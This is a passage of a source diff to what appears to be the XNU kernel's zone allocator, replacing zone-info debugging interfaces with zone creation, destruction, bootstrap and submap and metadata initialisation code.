+ */ + zone_view_count += 2; + } else { + zone_view_count += 1; } - - return TRUE; + z->z_views = zv; } -kern_return_t -task_zone_info( - __unused task_t task, - __unused mach_zone_name_array_t *namesp, - __unused mach_msg_type_number_t *namesCntp, - __unused task_zone_info_array_t *infop, - __unused mach_msg_type_number_t *infoCntp) +zone_t +zone_create( + const char *name, + vm_size_t size, + zone_create_flags_t flags) { - return KERN_FAILURE; + return zone_create_ext(name, size, flags, ZONE_ID_ANY, NULL); } -kern_return_t -mach_zone_info( - host_priv_t host, - mach_zone_name_array_t *namesp, - mach_msg_type_number_t *namesCntp, - mach_zone_info_array_t *infop, - mach_msg_type_number_t *infoCntp) +zone_t +zinit( + vm_size_t size, /* the size of an element */ + vm_size_t max, /* maximum memory to use */ + vm_size_t alloc __unused, /* allocation size */ + const char *name) /* a name for the zone */ { - return mach_memory_info(host, namesp, namesCntp, infop, infoCntp, NULL, NULL); + zone_t z = zone_create(name, size, ZC_DESTRUCTIBLE); + z->z_wired_max = zone_alloc_pages_for_nelems(z, max / size); + return z; } - -kern_return_t -mach_memory_info( - host_priv_t host, - mach_zone_name_array_t *namesp, - mach_msg_type_number_t *namesCntp, - mach_zone_info_array_t *infop, - mach_msg_type_number_t *infoCntp, - mach_memory_info_array_t *memoryInfop, - mach_msg_type_number_t *memoryInfoCntp) +void +zdestroy(zone_t z) { - mach_zone_name_t *names; - vm_offset_t names_addr; - vm_size_t names_size; - - mach_zone_info_t *info; - vm_offset_t info_addr; - vm_size_t info_size; + unsigned int zindex = zone_index(z); - mach_memory_info_t *memory_info; - vm_offset_t memory_info_addr; - vm_size_t memory_info_size; - vm_size_t memory_info_vmsize; - unsigned int num_info; + current_thread()->options |= TH_OPT_ZONE_PRIV; + lck_mtx_lock(&zone_gc_lock); - unsigned int max_zones, used_zones, i; - mach_zone_name_t *zn; - mach_zone_info_t *zi; - kern_return_t kr; + zone_reclaim(z, 
ZONE_RECLAIM_DESTROY); - uint64_t zones_collectable_bytes = 0; + lck_mtx_unlock(&zone_gc_lock); + current_thread()->options &= ~TH_OPT_ZONE_PRIV; - if (host == HOST_NULL) { - return KERN_INVALID_HOST; - } -#if CONFIG_DEBUGGER_FOR_ZONE_INFO - if (!PE_i_can_has_debugger(NULL)) { - return KERN_INVALID_HOST; +#if CONFIG_GZALLOC + if (__improbable(z->gzalloc_tracked)) { + /* If the zone is gzalloc managed dump all the elements in the free cache */ + gzalloc_empty_free_cache(z); } #endif - /* - * We assume that zones aren't freed once allocated. - * We won't pick up any zones that are allocated later. - */ + zone_lock(z); - max_zones = os_atomic_load(&num_zones, relaxed); + while (!zone_pva_is_null(z->z_pageq_va)) { + struct zone_page_metadata *meta; + vm_offset_t free_addr; - names_size = round_page(max_zones * sizeof *names); - kr = kmem_alloc_pageable(ipc_kernel_map, - &names_addr, names_size, VM_KERN_MEMORY_IPC); - if (kr != KERN_SUCCESS) { - return kr; + zone_counter_sub(z, z_va_cur, z->z_percpu ? 
1 : z->z_chunk_pages); + meta = zone_meta_queue_pop_native(z, &z->z_pageq_va, &free_addr); + assert(meta->zm_chunk_len <= ZM_CHUNK_LEN_MAX); + bzero(meta, sizeof(*meta) * z->z_chunk_pages); + zone_unlock(z); + kmem_free(zone_submap(z), free_addr, ptoa(z->z_chunk_pages)); + zone_lock(z); } - names = (mach_zone_name_t *) names_addr; - info_size = round_page(max_zones * sizeof *info); - kr = kmem_alloc_pageable(ipc_kernel_map, - &info_addr, info_size, VM_KERN_MEMORY_IPC); - if (kr != KERN_SUCCESS) { - kmem_free(ipc_kernel_map, - names_addr, names_size); - return kr; +#if !KASAN_ZALLOC + /* Assert that all counts are zero */ + if (z->z_elems_avail || z->z_elems_free || + zone_size_wired(z) || z->z_va_cur) { + panic("zdestroy: Zone %s%s isn't empty at zdestroy() time", + zone_heap_name(z), z->z_name); } - info = (mach_zone_info_t *) info_addr; - zn = &names[0]; - zi = &info[0]; + /* consistency check: make sure everything is indeed empty */ + assert(zone_pva_is_null(z->z_pageq_empty)); + assert(zone_pva_is_null(z->z_pageq_partial)); + assert(zone_pva_is_null(z->z_pageq_full)); + assert(zone_pva_is_null(z->z_pageq_va)); +#endif - used_zones = max_zones; - for (i = 0; i < max_zones; i++) { - if (!get_zone_info(&(zone_array[i]), zn, zi)) { - used_zones--; - continue; - } - zones_collectable_bytes += GET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable); - zn++; - zi++; - } + zone_unlock(z); - *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, names_size, used_zones * sizeof *names); - *namesCntp = used_zones; + simple_lock(&all_zones_lock, &zone_locks_grp); - *infop = (mach_zone_info_t *) create_vm_map_copy(info_addr, info_size, used_zones * sizeof *info); - *infoCntp = used_zones; + assert(!bitmap_test(zone_destroyed_bitmap, zindex)); + /* Mark the zone as empty in the bitmap */ + bitmap_set(zone_destroyed_bitmap, zindex); + num_zones_in_use--; + assert(num_zones_in_use > 0); - num_info = 0; - memory_info_addr = 0; + simple_unlock(&all_zones_lock); +} - if 
(memoryInfop && memoryInfoCntp) { - vm_map_copy_t copy; - num_info = vm_page_diagnose_estimate(); - memory_info_size = num_info * sizeof(*memory_info); - memory_info_vmsize = round_page(memory_info_size); - kr = kmem_alloc_pageable(ipc_kernel_map, - &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_IPC); - if (kr != KERN_SUCCESS) { - return kr; - } +#endif /* !ZALLOC_TEST */ +#pragma mark zalloc module init +#if !ZALLOC_TEST - kr = vm_map_wire_kernel(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize, - VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE); - assert(kr == KERN_SUCCESS); +/* + * Initialize the "zone of zones" which uses fixed memory allocated + * earlier in memory initialization. zone_bootstrap is called + * before zone_init. + */ +__startup_func +void +zone_bootstrap(void) +{ + /* Validate struct zone_packed_virtual_address expectations */ + static_assert((intptr_t)VM_MIN_KERNEL_ADDRESS < 0, "the top bit must be 1"); + if (VM_KERNEL_POINTER_SIGNIFICANT_BITS - PAGE_SHIFT > 31) { + panic("zone_pva_t can't pack a kernel page address in 31 bits"); + } - memory_info = (mach_memory_info_t *) memory_info_addr; - vm_page_diagnose(memory_info, num_info, zones_collectable_bytes); + zpercpu_early_count = ml_early_cpu_max_number() + 1; - kr = vm_map_unwire(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize, FALSE); - assert(kr == KERN_SUCCESS); + /* Set up zone element poisoning */ + zp_bootstrap(); - kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)memory_info_addr, - (vm_map_size_t)memory_info_size, TRUE, &copy); - assert(kr == KERN_SUCCESS); + /* + * the KASAN quarantine for kalloc doesn't understand heaps + * and trips the heap confusion panics. At the end of the day, + * all these security measures are double duty with KASAN. + * + * On 32bit kernels, these protections are just too expensive. 
+ */ +#if !defined(__LP64__) || KASAN_ZALLOC + zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER; + zsecurity_options &= ~ZSECURITY_OPTIONS_SUBMAP_USER_DATA; + zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER_KEXT_KALLOC; +#endif - *memoryInfop = (mach_memory_info_t *) copy; - *memoryInfoCntp = num_info; - } + thread_call_setup_with_options(&zone_expand_callout, + zone_expand_async, NULL, THREAD_CALL_PRIORITY_HIGH, + THREAD_CALL_OPTIONS_ONCE); + + thread_call_setup_with_options(&zone_defrag_callout, + zone_defrag_async, NULL, THREAD_CALL_PRIORITY_USER, + THREAD_CALL_OPTIONS_ONCE); +} + +#if __LP64__ +#if ARM_LARGE_MEMORY || __x86_64__ +#define ZONE_MAP_VIRTUAL_SIZE_LP64 (128ULL * 1024ULL * 1024 * 1024) +#else +#define ZONE_MAP_VIRTUAL_SIZE_LP64 (32ULL * 1024ULL * 1024 * 1024) +#endif +#endif /* __LP64__ */ - return KERN_SUCCESS; -} +#define ZONE_GUARD_SIZE (64UL << 10) -kern_return_t -mach_zone_info_for_zone( - host_priv_t host, - mach_zone_name_t name, - mach_zone_info_t *infop) +#if __LP64__ +static inline vm_offset_t +zone_restricted_va_max(void) { - zone_t zone_ptr; + vm_offset_t compressor_max = VM_PACKING_MAX_PACKABLE(C_SLOT_PACKED_PTR); + vm_offset_t vm_page_max = VM_PACKING_MAX_PACKABLE(VM_PAGE_PACKED_PTR); - if (host == HOST_NULL) { - return KERN_INVALID_HOST; - } -#if CONFIG_DEBUGGER_FOR_ZONE_INFO - if (!PE_i_can_has_debugger(NULL)) { - return KERN_INVALID_HOST; - } + return trunc_page(MIN(compressor_max, vm_page_max)); +} #endif - if (infop == NULL) { - return KERN_INVALID_ARGUMENT; +__startup_func +static void +zone_tunables_fixup(void) +{ + if (zone_map_jetsam_limit == 0 || zone_map_jetsam_limit > 100) { + zone_map_jetsam_limit = ZONE_MAP_JETSAM_LIMIT_DEFAULT; } + if (zc_magazine_size > PAGE_SIZE / ZONE_MIN_ELEM_SIZE) { + zc_magazine_size = (uint16_t)(PAGE_SIZE / ZONE_MIN_ELEM_SIZE); + } +} +STARTUP(TUNABLES, STARTUP_RANK_MIDDLE, zone_tunables_fixup); - zone_ptr = ZONE_NULL; - zone_index_foreach(i) { - zone_t z = &(zone_array[i]); - assert(z != 
ZONE_NULL); - - /* - * Append kalloc heap name to zone name (if zone is used by kalloc) - */ - char temp_zone_name[MAX_ZONE_NAME] = ""; - snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s", - zone_heap_name(z), z->z_name); +__startup_func +static vm_size_t +zone_phys_size_max(void) +{ + vm_size_t zsize; + vm_size_t zsizearg; - /* Find the requested zone by name */ - if (track_this_zone(temp_zone_name, name.mzn_name)) { - zone_ptr = z; - break; - } + if (PE_parse_boot_argn("zsize", &zsizearg, sizeof(zsizearg))) { + zsize = zsizearg * (1024ULL * 1024); + } else { + /* Set target zone size as 1/4 of physical memory */ + zsize = (vm_size_t)(sane_size >> 2); +#if defined(__LP64__) + zsize += zsize >> 1; +#endif /* __LP64__ */ } - /* No zones found with the requested zone name */ - if (zone_ptr == ZONE_NULL) { - return KERN_INVALID_ARGUMENT; + if (zsize < CONFIG_ZONE_MAP_MIN) { + zsize = CONFIG_ZONE_MAP_MIN; /* Clamp to min */ } - - if (get_zone_info(zone_ptr, NULL, infop)) { - return KERN_SUCCESS; + if (zsize > sane_size >> 1) { + zsize = (vm_size_t)(sane_size >> 1); /* Clamp to half of RAM max */ } - return KERN_FAILURE; + if (zsizearg == 0 && zsize > ZONE_MAP_MAX) { + /* if zsize boot-arg not present and zsize exceeds platform maximum, clip zsize */ + printf("NOTE: zonemap size reduced from 0x%lx to 0x%lx\n", + (uintptr_t)zsize, (uintptr_t)ZONE_MAP_MAX); + zsize = ZONE_MAP_MAX; + } + + return (vm_size_t)trunc_page(zsize); } -kern_return_t -mach_zone_info_for_largest_zone( - host_priv_t host, - mach_zone_name_t *namep, - mach_zone_info_t *infop) +__options_decl(zone_init_allocate_flags_t, unsigned, { + ZIA_NONE = 0x00000000, + ZIA_REPLACE = 0x00000001, /* replace a previous non permanent range */ + ZIA_RANDOM = 0x00000002, /* place at a random address */ + ZIA_PERMANENT = 0x00000004, /* permanent allocation */ + ZIA_GUARD = 0x00000008, /* will be used as a guard */ +}); + +__startup_func +static struct zone_map_range +zone_init_allocate_va(vm_map_address_t addr, vm_size_t 
size, + zone_init_allocate_flags_t flags) { - if (host == HOST_NULL) { - return KERN_INVALID_HOST; + vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; + int vm_alloc_flags = 0; + struct zone_map_range r; + kern_return_t kr; + + if (flags & ZIA_REPLACE) { + vm_alloc_flags |= VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE; + } else { + vm_alloc_flags |= VM_FLAGS_ANYWHERE; } -#if CONFIG_DEBUGGER_FOR_ZONE_INFO - if (!PE_i_can_has_debugger(NULL)) { - return KERN_INVALID_HOST; + if (flags & ZIA_RANDOM) { + vm_alloc_flags |= VM_FLAGS_RANDOM_ADDR; } -#endif - - if (namep == NULL || infop == NULL) { - return KERN_INVALID_ARGUMENT; + if (flags & ZIA_PERMANENT) { + vmk_flags.vmkf_permanent = true; } - if (get_zone_info(zone_find_largest(), namep, infop)) { - return KERN_SUCCESS; - } - return KERN_FAILURE; -} + vm_object_reference(kernel_object); -uint64_t -get_zones_collectable_bytes(void) -{ - uint64_t zones_collectable_bytes = 0; - mach_zone_info_t zi; + kr = vm_map_enter(kernel_map, &addr, size, 0, + vm_alloc_flags, vmk_flags, VM_KERN_MEMORY_ZONE, + kernel_object, 0, FALSE, + (flags & ZIA_GUARD) ? VM_PROT_NONE : VM_PROT_DEFAULT, + (flags & ZIA_GUARD) ? 
VM_PROT_NONE : VM_PROT_DEFAULT, + VM_INHERIT_NONE); - zone_index_foreach(i) { - if (get_zone_info(&zone_array[i], NULL, &zi)) { - zones_collectable_bytes += - GET_MZI_COLLECTABLE_BYTES(zi.mzi_collectable); - } + if (KERN_SUCCESS != kr) { + panic("vm_map_enter(0x%zx) failed: %d", (size_t)size, kr); } - return zones_collectable_bytes; + r.min_address = (vm_offset_t)addr; + r.max_address = (vm_offset_t)addr + size; + return r; } -kern_return_t -mach_zone_get_zlog_zones( - host_priv_t host, - mach_zone_name_array_t *namesp, - mach_msg_type_number_t *namesCntp) +__startup_func +static void +zone_submap_init( + vm_offset_t *submap_min, + unsigned idx, + uint64_t zone_sub_map_numer, + uint64_t *remaining_denom, + vm_offset_t *remaining_size, + vm_size_t guard_size) { -#if ZONE_ENABLE_LOGGING - unsigned int max_zones, logged_zones, i; + vm_offset_t submap_start, submap_end; + vm_size_t submap_size; + vm_map_t submap; kern_return_t kr; - zone_t zone_ptr; - mach_zone_name_t *names; - vm_offset_t names_addr; - vm_size_t names_size; - if (host == HOST_NULL) { - return KERN_INVALID_HOST; - } + submap_size = trunc_page(zone_sub_map_numer * *remaining_size / + *remaining_denom); + submap_start = *submap_min; + submap_end = submap_start + submap_size; - if (namesp == NULL || namesCntp == NULL) { - return KERN_INVALID_ARGUMENT; - } +#if defined(__LP64__) + if (idx == Z_SUBMAP_IDX_VA_RESTRICTED) { + vm_offset_t restricted_va_max = zone_restricted_va_max(); + if (submap_end > restricted_va_max) { +#if DEBUG || DEVELOPMENT + printf("zone_init: submap[%d] clipped to %zdM of %zdM\n", idx, + (size_t)(restricted_va_max - submap_start) >> 20, + (size_t)submap_size >> 20); +#endif /* DEBUG || DEVELOPMENT */ + guard_size += submap_end - restricted_va_max; + *remaining_size -= submap_end - restricted_va_max; + submap_end = restricted_va_max; + submap_size = restricted_va_max - submap_start; + } - max_zones = os_atomic_load(&num_zones, relaxed); + vm_packing_verify_range("vm_compressor", + 
submap_start, submap_end, VM_PACKING_PARAMS(C_SLOT_PACKED_PTR)); + vm_packing_verify_range("vm_page", + submap_start, submap_end, VM_PACKING_PARAMS(VM_PAGE_PACKED_PTR)); + } +#endif /* defined(__LP64__) */ - names_size = round_page(max_zones * sizeof *names); - kr = kmem_alloc_pageable(ipc_kernel_map, - &names_addr, names_size, VM_KERN_MEMORY_IPC); + vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; + vmk_flags.vmkf_permanent = TRUE; + kr = kmem_suballoc(kernel_map, submap_min, submap_size, + FALSE, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, vmk_flags, + VM_KERN_MEMORY_ZONE, &submap); if (kr != KERN_SUCCESS) { - return kr; + panic("kmem_suballoc(kernel_map[%d] %p:%p) failed: %d", + idx, (void *)submap_start, (void *)submap_end, kr); } - names = (mach_zone_name_t *) names_addr; - zone_ptr = ZONE_NULL; - logged_zones = 0; - for (i = 0; i < max_zones; i++) { - zone_t z = &(zone_array[i]); - assert(z != ZONE_NULL); +#if DEBUG || DEVELOPMENT + printf("zone_init: submap[%d] %p:%p (%zuM)\n", + idx, (void *)submap_start, (void *)submap_end, + (size_t)submap_size >> 20); +#endif /* DEBUG || DEVELOPMENT */ - /* Copy out the zone name if zone logging is enabled */ - if (z->zlog_btlog) { - get_zone_info(z, &names[logged_zones], NULL); - logged_zones++; - } + zone_init_allocate_va(submap_end, guard_size, + ZIA_PERMANENT | ZIA_GUARD | ZIA_REPLACE); + + zone_submaps[idx] = submap; + *submap_min = submap_end + guard_size; + *remaining_size -= submap_size; + *remaining_denom -= zone_sub_map_numer; +} + +/* + * Allocate metadata array and migrate foreign initial metadata. + * + * So that foreign pages and native pages have the same scheme, + * we allocate VA space that covers both foreign and native pages. 
+ */ +__startup_func +static void +zone_metadata_init(void) +{ + struct zone_map_range r0 = zone_info.zi_map_range[0]; + struct zone_map_range r1 = zone_info.zi_map_range[1]; + struct zone_map_range mr, br; + vm_size_t meta_size, bits_size, foreign_base; + vm_offset_t hstart, hend; + + if (r0.min_address > r1.min_address) { + r0 = zone_info.zi_map_range[1]; + r1 = zone_info.zi_map_range[0]; } - *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, names_size, logged_zones * sizeof *names); - *namesCntp = logged_zones; + meta_size = round_page(atop(r1.max_address - r0.min_address) * + sizeof(struct zone_page_metadata)) + ZONE_GUARD_SIZE * 2; - return KERN_SUCCESS; + /* + * Allocations can't be smaller than 8 bytes, which is 128b / 16B per 1k + * of physical memory (16M per 1G). + * + * Let's preallocate for the worst to avoid weird panics. + */ + bits_size = round_page(16 * (ptoa(zone_phys_mapped_max_pages) >> 10)); -#else /* ZONE_ENABLE_LOGGING */ -#pragma unused(host, namesp, namesCntp) - return KERN_FAILURE; -#endif /* ZONE_ENABLE_LOGGING */ -} + /* + * Compute the size of the "hole" in the middle of the range. 
+ * + * If it is smaller than 256k, just leave it be, with this layout: + * + * [G][ r0 meta ][ hole ][ r1 meta ][ bits ][G] + * + * else punch a hole with guard pages around the hole, and place the + * bits in the hole if it fits, or after r1 otherwise, yielding either + * of the following layouts: + * + * |__________________hend____________| + * |__hstart_| | + * [G][ r0 meta ][ bits ][G]..........[G][ r1 meta ][G] + * [G][ r0 meta ][G]..................[G][ r1 meta ][ bits ][G] + */ + hstart = round_page(atop(r0.max_address - r0.min_address) * + sizeof(struct zone_page_metadata)); + hend = trunc_page(atop(r1.min_address - r0.min_address) * + sizeof(struct zone_page_metadata)); + + if (hstart >= hend || hend - hstart < (256ul << 10)) { + mr = zone_init_allocate_va(0, meta_size + bits_size, + ZIA_PERMANENT | ZIA_RANDOM); + mr.min_address += ZONE_GUARD_SIZE; + mr.max_address -= ZONE_GUARD_SIZE; + br.max_address = mr.max_address; + mr.max_address -= bits_size; + br.min_address = mr.max_address; -kern_return_t -mach_zone_get_btlog_records( - host_priv_t host, - mach_zone_name_t name, - zone_btrecord_array_t *recsp, - mach_msg_type_number_t *recsCntp) -{ #if DEBUG || DEVELOPMENT - unsigned int numrecs = 0; - zone_btrecord_t *recs; - kern_return_t kr; - zone_t zone_ptr; - vm_offset_t recs_addr; - vm_size_t recs_size; + printf("zone_init: metadata %p:%p (%zuK)\n", + (void *)mr.min_address, (void *)mr.max_address, + (size_t)zone_range_size(&mr) >> 10); + printf("zone_init: metabits %p:%p (%zuK)\n", + (void *)br.min_address, (void *)br.max_address, + (size_t)zone_range_size(&br) >> 10); +#endif /* DEBUG || DEVELOPMENT */ + } else { + vm_size_t size, alloc_size = meta_size; + vm_offset_t base; + bool bits_in_middle = true; - if (host == HOST_NULL) { - return KERN_INVALID_HOST; - } + if (hend - hstart - 2 * ZONE_GUARD_SIZE < bits_size) { + alloc_size += bits_size; + bits_in_middle = false; + } - if (recsp == NULL || recsCntp == NULL) { - return KERN_INVALID_ARGUMENT; - } + 
mr = zone_init_allocate_va(0, alloc_size, ZIA_RANDOM); + + base = mr.min_address; + size = ZONE_GUARD_SIZE + hstart + ZONE_GUARD_SIZE; + if (bits_in_middle) { + size += bits_size; + br.min_address = base + ZONE_GUARD_SIZE + hstart; + br.max_address = br.min_address + bits_size; + } + zone_init_allocate_va(base, size, ZIA_PERMANENT | ZIA_REPLACE); - zone_ptr = ZONE_NULL; - zone_index_foreach(i) { - zone_t z = &zone_array[i]; + base += size; + size = mr.min_address + hend - base; + kmem_free(kernel_map, base, size); - /* - * Append kalloc heap name to zone name (if zone is used by kalloc) - */ - char temp_zone_name[MAX_ZONE_NAME] = ""; - snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s", - zone_heap_name(z), z->z_name); + base = mr.min_address + hend; + size = mr.max_address - base; + zone_init_allocate_va(base, size, ZIA_PERMANENT | ZIA_REPLACE); - /* Find the requested zone by name */ - if (track_this_zone(temp_zone_name, name.mzn_name)) { - zone_ptr = z; - break; + mr.min_address += ZONE_GUARD_SIZE; + mr.max_address -= ZONE_GUARD_SIZE; + if (!bits_in_middle) { + br.max_address = mr.max_address; + mr.max_address -= bits_size; + br.min_address = mr.max_address; } + +#if DEBUG || DEVELOPMENT + printf("zone_init: metadata0 %p:%p (%zuK)\n", + (void *)mr.min_address, (void *)(mr.min_address + hstart), + (size_t)hstart >> 10); + printf("zone_init: metadata1 %p:%p (%zuK)\n", + (void *)(mr.min_address + hend), (void *)mr.max_address, + (size_t)(zone_range_size(&mr) - hend) >> 10); + printf("zone_init: metabits %p:%p (%zuK)\n", + (void *)br.min_address, (void *)br.max_address, + (size_t)zone_range_size(&br) >> 10); +#endif /* DEBUG || DEVELOPMENT */ } - /* No zones found with the requested zone name */ - if (zone_ptr == ZONE_NULL) { - return KERN_INVALID_ARGUMENT; + br.min_address = (br.min_address + ZBA_CHUNK_SIZE - 1) & -ZBA_CHUNK_SIZE; + br.max_address = br.max_address & -ZBA_CHUNK_SIZE; + + zone_info.zi_meta_range = mr; + zone_info.zi_bits_range = br; + + /* + * Migrate 
the original static metadata into its new location. + */ + zone_info.zi_meta_base = (struct zone_page_metadata *)mr.min_address - + zone_pva_from_addr(r0.min_address).packed_address; + foreign_base = zone_info.zi_map_range[ZONE_ADDR_FOREIGN].min_address; + zone_meta_populate(foreign_base, zone_foreign_size()); + memcpy(zone_meta_from_addr(foreign_base), + zone_foreign_meta_array_startup, + atop(zone_foreign_size()) * sizeof(struct zone_page_metadata)); + + zba_populate(0); + memcpy(zba_base_header(), zba_chunk_startup, + sizeof(zba_chunk_startup)); +} + +/* Global initialization of Zone Allocator. + * Runs after zone_bootstrap. + */ +__startup_func +static void +zone_init(void) +{ + vm_size_t zone_map_size; + vm_size_t remaining_size; + vm_offset_t submap_min = 0; + uint64_t denom = 0; + uint64_t submap_ratios[Z_SUBMAP_IDX_COUNT] = { +#ifdef __LP64__ + [Z_SUBMAP_IDX_VA_RESTRICTED] = 20, +#else + [Z_SUBMAP_IDX_VA_RESERVE] = 10, +#endif /* defined(__LP64__) */ + [Z_SUBMAP_IDX_GENERAL] = 40, + [Z_SUBMAP_IDX_BAG_OF_BYTES] = 40, + }; + + if (ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) { + zone_last_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES; + } else { + zone_last_submap_idx = Z_SUBMAP_IDX_GENERAL; } + zone_phys_mapped_max_pages = (uint32_t)atop(zone_phys_size_max()); - /* Logging not turned on for the requested zone */ - if (!DO_LOGGING(zone_ptr)) { - return KERN_FAILURE; + for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) { +#if DEBUG || DEVELOPMENT + char submap_name[1 + sizeof("submap")]; + snprintf(submap_name, sizeof(submap_name), "submap%d", idx); + PE_parse_boot_argn(submap_name, &submap_ratios[idx], sizeof(uint64_t)); +#endif + denom += submap_ratios[idx]; } - /* Allocate memory for btlog records */ - numrecs = (unsigned int)(get_btlog_records_count(zone_ptr->zlog_btlog)); - recs_size = round_page(numrecs * sizeof *recs); +#if __LP64__ + zone_map_size = ZONE_MAP_VIRTUAL_SIZE_LP64; +#else + zone_map_size = ptoa(zone_phys_mapped_max_pages * + 
(denom + submap_ratios[Z_SUBMAP_IDX_VA_RESERVE]) / denom); +#endif - kr = kmem_alloc_pageable(ipc_kernel_map, &recs_addr, recs_size, VM_KERN_MEMORY_IPC); - if (kr != KERN_SUCCESS) { - return kr; - } + remaining_size = zone_map_size - + ZONE_GUARD_SIZE * (zone_last_submap_idx + 1); /* - * We will call get_btlog_records() below which populates this region while holding a spinlock - * (the btlog lock). So these pages need to be wired. + * And now allocate the various pieces of VA and submaps. + * + * Make a first allocation of contiguous VA, that we'll deallocate, + * and we'll carve-out memory in that range again linearly. + * The kernel is stil single threaded at this stage. */ - kr = vm_map_wire_kernel(ipc_kernel_map, recs_addr, recs_addr + recs_size, - VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE); - assert(kr == KERN_SUCCESS); - - recs = (zone_btrecord_t *)recs_addr; - get_btlog_records(zone_ptr->zlog_btlog, recs, &numrecs); - - kr = vm_map_unwire(ipc_kernel_map, recs_addr, recs_addr + recs_size, FALSE); - assert(kr == KERN_SUCCESS); - *recsp = (zone_btrecord_t *) create_vm_map_copy(recs_addr, recs_size, numrecs * sizeof *recs); - *recsCntp = numrecs; + struct zone_map_range *map_range = + &zone_info.zi_map_range[ZONE_ADDR_NATIVE]; - return KERN_SUCCESS; + *map_range = zone_init_allocate_va(0, zone_map_size, ZIA_NONE); + submap_min = map_range->min_address; -#else /* DEBUG || DEVELOPMENT */ -#pragma unused(host, name, recsp, recsCntp) - return KERN_FAILURE; -#endif /* DEBUG || DEVELOPMENT */ -} + /* + * Allocate the submaps + */ + for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) { + zone_submap_init(&submap_min, idx, submap_ratios[idx], + &denom, &remaining_size, ZONE_GUARD_SIZE); + } + assert(submap_min == map_range->max_address); -#if DEBUG || DEVELOPMENT + zone_metadata_init(); -kern_return_t -mach_memory_info_check(void) -{ - mach_memory_info_t * memory_info; - mach_memory_info_t * info; - unsigned int num_info; - vm_offset_t 
memory_info_addr; - kern_return_t kr; - size_t memory_info_size, memory_info_vmsize; - uint64_t top_wired, zonestotal, total; +#if VM_MAX_TAG_ZONES + if (zone_tagging_on) { + zone_tagging_init(zone_map_size); + } +#endif +#if CONFIG_GZALLOC + gzalloc_init(zone_map_size); +#endif - num_info = vm_page_diagnose_estimate(); - memory_info_size = num_info * sizeof(*memory_info); - memory_info_vmsize = round_page(memory_info_size); - kr = kmem_alloc(kernel_map, &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_DIAG); - assert(kr == KERN_SUCCESS); + zone_create_flags_t kma_flags = ZC_NOCACHING | + ZC_NOGC | ZC_NOENCRYPT | ZC_NOGZALLOC | ZC_NOCALLOUT | + ZC_KASAN_NOQUARANTINE | ZC_KASAN_NOREDZONE; - memory_info = (mach_memory_info_t *) memory_info_addr; - vm_page_diagnose(memory_info, num_info, 0); + (void)zone_create_ext("vm.permanent", 1, kma_flags, + ZONE_ID_PERMANENT, ^(zone_t z){ + z->z_permanent = true; + z->z_elem_size = 1; +#if defined(__LP64__) + z->z_submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED; +#endif + }); + (void)zone_create_ext("vm.permanent.percpu", 1, kma_flags | ZC_PERCPU, + ZONE_ID_PERCPU_PERMANENT, ^(zone_t z){ + z->z_permanent = true; + z->z_elem_size = 1; +#if defined(__LP64__) + z->z_submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED; +#endif + }); - top_wired = total = zonestotal = 0; + /* + * Now migrate the startup statistics into their final storage. 
+ */ + int cpu = cpu_number(); zone_index_foreach(idx) { - zonestotal += zone_size_wired(&zone_array[idx]); - } + zone_t tz = &zone_array[idx]; - for (uint32_t idx = 0; idx < num_info; idx++) { - info = &memory_info[idx]; - if (!info->size) { - continue; - } - if (VM_KERN_COUNT_WIRED == info->site) { - top_wired = info->size; - } - if (VM_KERN_SITE_HIDE & info->flags) { - continue; - } - if (!(VM_KERN_SITE_WIRED & info->flags)) { - continue; + if (tz->z_stats == __zpcpu_mangle_for_boot(&zone_stats_startup[idx])) { + zone_stats_t zs = zalloc_percpu_permanent_type(struct zone_stats); + + *zpercpu_get_cpu(zs, cpu) = *zpercpu_get_cpu(tz->z_stats, cpu); + tz->z_stats = zs; +#if ZONE_ENABLE_LOGGING + if (tz->zone_logging && !tz->zlog_btlog) { + zone_enable_logging(tz); + } +#endif /* ZONE_ENABLE_LOGGING */ } - total += info->size; } - total += zonestotal; - printf("vm_page_diagnose_check %qd of %qd, zones %qd, short 0x%qx\n", - total, top_wired, zonestotal, top_wired - total); - - kmem_free(kernel_map, memory_info_addr, memory_info_vmsize); +#if CONFIG_ZLEAKS + /* + * Initialize the zone leak monitor + */ + zleak_init(zone_map_size); +#endif /* CONFIG_ZLEAKS */ - return kr; +#if VM_MAX_TAG_ZONES + if (zone_tagging_on) { + vm_allocation_zones_init(); + } +#endif } +STARTUP(ZALLOC, STARTUP_RANK_FIRST, zone_init); -extern boolean_t(*volatile consider_buffer_cache_collect)(int); +__startup_func +static void +zone_cache_bootstrap(void) +{ + zone_t magzone; -#endif /* DEBUG || DEVELOPMENT */ + magzone = zone_create("zcc_magazine_zone", sizeof(struct zone_magazine) + + zc_mag_size() * sizeof(zone_element_t), + ZC_NOGZALLOC | ZC_KASAN_NOREDZONE | ZC_KASAN_NOQUARANTINE | + ZC_SEQUESTER | ZC_CACHING | ZC_ZFREE_CLEARMEM); + magzone->z_elems_rsv = (uint16_t)(2 * zpercpu_count()); -kern_return_t -mach_zone_force_gc( - host_t host) -{ - if (host == HOST_NULL) { - return KERN_INVALID_HOST; - } + os_atomic_store(&zc_magazine_zone, magzone, compiler_acq_rel); -#if DEBUG || DEVELOPMENT - 
